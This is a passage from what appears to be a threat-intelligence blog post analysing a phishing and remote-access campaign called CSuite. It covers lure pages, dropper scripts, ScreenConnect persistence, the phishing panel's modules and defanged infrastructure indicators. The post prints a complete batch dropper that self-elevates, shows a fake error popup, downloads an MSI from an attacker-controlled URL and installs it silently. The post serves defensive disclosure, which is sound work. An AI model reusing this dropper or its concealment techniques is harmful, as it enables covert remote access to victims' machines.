                                        pdf_Reader_en_install.msiand DocusignEditSetup.msifrom localcontex[.]online                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Opens the file straight from the download folder                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Batch script fetching from a code-hosting repository                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        324-byte NMLS 2026 Updated Agreement.bat calling msiexec/i on agithub[.]com/Ivan3900/...raw URL                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Runs the script and clears one elevation prompt                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Simple dropper staging the installer                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        1.1 KB .bat or .vbs that writes the package to the temporary directory and calls msiexec/qn                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C5"
                    data-col-index="2"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Runs the script; a fake error popup covers the install                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-389'>
table#wpdtSimpleTable-389{ table-layout: fixed !important; }
table#wpdtSimpleTable-389 td, table.wpdtSimpleTable389 th { white-space: normal !important; }
</style>




<p class="wp-block-paragraph">What changes between campaigns is how the installer gets onto the disk, and there are four ways in use. </p>


<div class="wp-block-image">
<figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" width="825" height="833" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/screenconnect-execution.png" alt="ANY.RUN Sandbox Process tree with ScreenConnect detection	 " class="wp-image-23243" style="width:613px;height:auto" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/screenconnect-execution.png 825w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/screenconnect-execution-297x300.png 297w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/screenconnect-execution-150x150.png 150w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/screenconnect-execution-768x775.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/screenconnect-execution-70x70.png 70w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/screenconnect-execution-370x374.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/screenconnect-execution-270x273.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/screenconnect-execution-740x747.png 740w" sizes="auto, (max-width: 825px) 100vw, 825px" /><figcaption class="wp-element-caption"> <br><em>ANY.RUN Sandbox Process tree with ScreenConnect detection</em> </figcaption></figure>
</div>


<p class="wp-block-paragraph">The client that lands most often is a ScreenConnect build. Installation does three things that push the outcome past ordinary remote access: a credential provider is registered, so the operator sees the interactive logon; an authentication package is appended to LSA, which loads attacker code into the authentication path at boot; and the service is registered to start in safe mode with networking, so it survives the first thing an administrator usually tries.  </p>



<h3 class="wp-block-heading">The Script Droppers </h3>



<p class="wp-block-paragraph">Two generations of script dropper run alongside the archives. The newer one is the 324-byte batch file shown earlier: an fltmc check for administrative rights, a PowerShell relaunch through UAC, andmsiexec pointed straight at a raw URL on the group’s code-hosting account. </p>



<p class="wp-block-paragraph">The older generation is 1.1 KB and stages the package itself. It ships as Adobe Installer V3572.bat, Updated Service Agreement 2026.bat and Update_6779.bat; the three are one file with the variable names, the console title, the temporary filenames and the download URL swapped: </p>



<pre class="wp-block-code"><code>:: --- Self-elevate (UAC prompt right after the brief CMD flash) --- 
net session &gt;nul 2&gt;&amp;1 
if %errorLevel% NEQ 0 ( 
    powershell -WindowStyle Hidden -Command "Start-Process '%~f0' -Verb RunAs" 
    exit /b 
) 
:: --- Write a tiny VBS so the fake popup auto-times-out --- 
&gt; "%kdpS%" echo Set s = CreateObject("WScript.Shell") 
&gt;&gt;"%kdpS%" echo s.Popup "Unexpected error. The operation will retry.", 4, "Application Error", 48 
start "" wscript.exe "%kdpS%" 
:: --- Download the MSI via PowerShell WebClient --- 
powershell -WindowStyle Hidden -Command "(New-Object Net.WebClient).DownloadFile('https://app.action1.com/agent/5c2cda44-433f-11f1-9ef8-332f425c6d9a/Windows/agent(My_Organization).msi', '%LbiAu%')" 
:: --- Install silently (blocks until msiexec finishes) --- 
if exist "%LbiAu%" msiexec /i "%LbiAu%" /qn 
timeout /t 5 /nobreak &gt;nul 
del "%LbiAu%" /q &gt;nul 2&gt;&amp;1 
del "%kdpS%" /q &gt;nul 2&gt;&amp;1 </code></pre>



<p class="wp-block-paragraph">A four-second Application Error popup, written out as a throwaway VBS so that it dismisses itself, covers the seconds while the agent installs, and both temporary files are deleted afterwards. The three copies fetch from three different places: the operator’s own Action1 tenant on the vendor’s cloud, an R2 bucket, and a self-hosted ScreenConnect server at 64.204.180[.]203:8040 addressed as/Bin/Adobe.ClientSetup.msi?e=Access&amp;y=Guest. The temporary names are chosen to read as maintenance — patch651.msi, patch495.msi, svchost805.vbs — and the console title is always Update_ and four digits. The VBS variant of the same dropper, Amended_Agreement 02026.vbs, assembles the same msiexec command line as a string. </p>



<p class="wp-block-paragraph">The affiliate behind lure page B runs four more lure lines from arubanetworks-inc[.]com and sharepointer-dr[.]com, all reporting to the same endpoint. </p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-388"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="3"
           data-rows="5"
           data-wpID="388"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell "
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        Lure                     </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        Path                     </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        Payload observed                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        DocuSign                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        /DocuSign/                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        DocuSign.vbs,DocuSign_Setup.exe                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Google Meet                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        /Meeting/,/Meeting/Windows/                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        GoogleMeet.vbs,GoogleMeet_Setup.exe                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Zoom workspace                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        /ZoomWorkspace/,/ZoomWorkspace/Windows/                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        ZoomWorkspace.vbs                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Dropbox document                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        /dropbox/create.html, /dropbox/csm.html                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C5"
                    data-col-index="2"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Q4ForecastReportvFinal.PdF.vbs                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-388'>
table#wpdtSimpleTable-388{ table-layout: fixed !important; }
table#wpdtSimpleTable-388 td, table.wpdtSimpleTable388 th { white-space: normal !important; }
</style>




<h2 class="wp-block-heading">Network Infrastructure </h2>



<p class="wp-block-paragraph">Operator’s Lure pages and payloads sit on one hosting on a server fronted by greenbullet[.]ba. Four certificates issued on one day, 4 August 2026, cover gddfzxa[.]online, ghs.coorpes[.]com,greaterheights[.]sbs and mmswerod[.]sbs, and nothing on the account belongs to a legitimate business: three of those four names have no prior record anywhere, and the fourth is the random-string domain that serves the lures. </p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-387"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="2"
           data-rows="10"
           data-wpID="387"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell "
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:50%;                    padding:10px;
                    "
                    >
                                        Host or address                     </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:50%;                    padding:10px;
                    "
                    >
                                        Role                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        gddfzxa[.]online                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Lure pages and payload archives; also listed in the panel domain registry                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        ghs.coorpes[.]com,greaterheights[.]sbs,mmswerod[.]sbs                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Certificates on the same hosting                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        emsafetoproceedtaward[.]top                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Lure domain, registered 7 August 2026                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        maillive[.]sbs                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Panel administration host and device-code landing page                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        arubanetworks-inc[.]com,sharepointer-dr[.]com                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        DocuSign, Meeting, Zoom and Dropbox lure lines                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        stubborn-academy[.]icu                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Address validator                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A8"
                    data-col-index="0"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        corporate-sync-gate[.]net, legacy-bridge-node[.]net                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B8"
                    data-col-index="1"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        Post-capture redirects; the second is shared between two panels                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A9"
                    data-col-index="0"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        207.189.19[.]40:26688                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B9"
                    data-col-index="1"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        Remote-desktop foothold used for hands-on work                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A10"
                    data-col-index="0"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        185.174.102[.]34                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B10"
                    data-col-index="1"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        GSuite panel                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-387'>
table#wpdtSimpleTable-387{ table-layout: fixed !important; }
table#wpdtSimpleTable-387 td, table.wpdtSimpleTable387 th { white-space: normal !important; }
</style>




<p class="wp-block-paragraph">Two things in this layer outlast everything else. The shared script path survived seven months of domain rotation, and the remote-management tenant identifier is fixed per build, so it marks every host the group installs on. </p>



<h2 class="wp-block-heading">Attribution </h2>



<p class="wp-block-paragraph">Several parts of the investigation point back to the same operating environment, including shared infrastructure, delivery tooling, panel domains, and operator-controlled accounts. Together, these links connect the phishing, session-capture, and remote-access activity to the operation tracked here as CSuite. </p>



<h3 class="wp-block-heading">CSuite v1.1 </h3>



<p class="wp-block-paragraph">The panel calls itself CSuite v1.1 and administers itself from, for example, maillive[.]sbs, which doubles as a device-code landing page. It carries 23 modules. </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="570" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/SCuite-Sessions-module-1024x570.png" alt="The Sessions module: 29 captured Office 365 sessions with a live feed of targets, grouped as Active Work, Roll and Others." class="wp-image-23244" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/SCuite-Sessions-module-1024x570.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/SCuite-Sessions-module-300x167.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/SCuite-Sessions-module-768x428.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/SCuite-Sessions-module-1536x855.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/SCuite-Sessions-module-2048x1140.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/SCuite-Sessions-module-370x206.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/SCuite-Sessions-module-270x150.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/SCuite-Sessions-module-740x412.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>The Sessions module: Captured Office sessions with a live feed of targets, grouped as Active Work, Roll and Others</em></figcaption></figure>
</div>

<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="574" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/SCuite-session-module-1-1024x574.png" alt="The Adobe Sender module, an Adobe Document Cloud control hub: 1,593 documents sent across all jobs, with the share-invite form on the right" class="wp-image-23246" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/SCuite-session-module-1-1024x574.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/SCuite-session-module-1-300x168.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/SCuite-session-module-1-768x431.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/SCuite-session-module-1-1536x861.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/SCuite-session-module-1-2048x1149.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/SCuite-session-module-1-370x208.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/SCuite-session-module-1-270x151.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/SCuite-session-module-1-740x415.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>The Adobe Sender module, an Adobe Document Cloud control hub: 1,593 documents sent across all jobs, with the share-invite form on the right</em></figcaption></figure>
</div>

<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="574" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Logs-module-1024x574.png" alt="The Logs module: session refresh and expiry events per target, each row carrying the victim address, location and carrier." class="wp-image-23247" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Logs-module-1024x574.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Logs-module-300x168.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Logs-module-768x431.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Logs-module-1536x861.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Logs-module-2048x1149.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Logs-module-370x208.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Logs-module-270x151.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Logs-module-740x415.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>The Logs module: session refresh and expiry events per target, each row carrying the victim address, location and carrier</em></figcaption></figure>
</div>

<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="573" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/S22-1024x573.png" alt="The Offline File Generator" class="wp-image-23249" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/S22-1024x573.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/S22-300x168.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/S22-768x430.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/S22-1536x860.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/S22-370x207.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/S22-270x151.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/S22-740x414.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/S22.png 2020w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>The Offline File Generator: self-contained HTML attachment templates and the per-domain capture list</em></figcaption></figure>
</div>

<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="577" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-module-1024x577.png" alt="DocForge, which generates branded lure documents around an obfuscated payload URL" class="wp-image-23251" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-module-1024x577.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-module-300x169.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-module-768x432.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-module-1536x865.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-module-370x208.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-module-270x152.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-module-740x417.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-module.png 2005w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>DocForge, which generates branded lure documents around an obfuscated payload URL</em></figcaption></figure>
</div>

<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="571" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/The-add-domain-form-of-CSuite-1024x571.png" alt="The add-domain form, with the landing template list: Office 365 Voicemail, SharePoint, DocuSign, Adobe PDF and Teams" class="wp-image-23252" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/The-add-domain-form-of-CSuite-1024x571.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/The-add-domain-form-of-CSuite-300x167.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/The-add-domain-form-of-CSuite-768x428.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/The-add-domain-form-of-CSuite-1536x856.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/The-add-domain-form-of-CSuite-370x206.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/The-add-domain-form-of-CSuite-270x150.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/The-add-domain-form-of-CSuite-740x412.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/The-add-domain-form-of-CSuite.png 2021w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>The add-domain form, with the landing template list: Office 365 Voicemail, SharePoint, DocuSign, Adobe PDF and Teams</em></figcaption></figure>
</div>

<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="577" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-details-1024x577.png" alt="An edit-domain dialogue: the Adobe PDF template, device-code capture mode and a post-capture redirect to corporate-sync-gate[.]net" class="wp-image-23253" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-details-1024x577.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-details-300x169.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-details-768x432.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-details-1536x865.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-details-370x208.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-details-270x152.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-details-740x417.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-details.png 2023w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>An edit-domain dialogue: the Adobe PDF template, device-code capture mode and a post-capture redirect to corporate-sync-gate[.]net</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">The Adobe PDF template in that list is one of the observations that binds the two arms. The panel ships a landing template and a whole sender module built for the Adobe theme, and the delivery arm serves Adobe-themed pages from a domain that appears in the panel’s own registry. </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="989" height="1024" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/S35-989x1024.png" alt="Settings: an OpenRouter assistant configured with nvidia/nemotron-3-super-120b-a12b, alongside the operator’s Cloudflare Turnstile site and secret keys" class="wp-image-23254" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/S35-989x1024.png 989w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/S35-290x300.png 290w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/S35-768x795.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/S35-370x383.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/S35-270x280.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/S35-740x766.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/S35.png 1096w" sizes="auto, (max-width: 989px) 100vw, 989px" /><figcaption class="wp-element-caption"><em>Settings: an OpenRouter assistant configured with nvidia/nemotron-3-super-120b-a12b, alongside the operator’s Cloudflare Turnstile site and secret keys</em></figcaption></figure>
</div>

<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="568" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-settings-1024x568.png" alt="Settings: operator notifications, Cloudflare automation bound to the operator’s own account, and scheduled off-panel backup of the session database. " class="wp-image-23255" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-settings-1024x568.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-settings-300x166.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-settings-768x426.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-settings-1536x852.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-settings-370x205.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-settings-270x150.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-settings-740x411.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-settings.png 2037w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Settings: operator notifications, Cloudflare automation bound to the operator’s own account, and scheduled off-panel backup of the session database</em></figcaption></figure>
</div>


<h2 class="wp-block-heading">Cluster Expansion </h2>



<p class="wp-block-paragraph">The panel’s own working modules carry far more infrastructure than the delivery chain ever touched. Four artifact classes expand the cluster. </p>



<p class="wp-block-paragraph"><strong>The domain registry.</strong> Thirty-eight domains, each row tagged with a role, a capture mode, an anti-bot setting, a geographic filter and a Cloudflare Worker binding. Registry additions run from 2 April to 14 August 2026. Fourteen are live lure hosts, eight are redirectors, two run the Chameleon harvester, three are post-capture redirect targets, and seven sit on borrowed or borrowed-looking infrastructure: the shared-hosting domains behind the Adobe pages, plus two names built to read as organizations the group targets. </p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-385"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="2"
           data-rows="7"
           data-wpID="385"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell "
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:50%;                    padding:10px;
                    "
                    >
                                        Role                     </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:50%;                    padding:10px;
                    "
                    >
                                        Domains                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Lure                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        pdfsecurtoview365[.]sbs, pdfsecurtoviewsuite[.]sbs,selectivelife01[.]sbs, docsendsr[.]online,docseedn[.]online, docseed[.]online, pikecac[.]cfd,allshore-io[.]cam, giiro[.]net,expressdocumentdelivery[.]org, sharerpoint[.]cam,voicermailsmessager[.]cam,keepsecurepasserword[.]cam, qrcoderuser[.]cfd,fincapitalxcom[.]cfd, emsafetoproceedtaward[.]top                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Redirector                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        pdfsecurtoview[.]sbs, pdfsecurtoview[.]cfd,pdfsecurtoview[.]info, pdfsecurtoview365[.]cfd,documentsonitustechnologies[.]sbs,downloaddocumentcontechbuilding[.]sbs,documentationreviewdocument2026review[.]sbs,aviationpioneers[.]info                     </td>
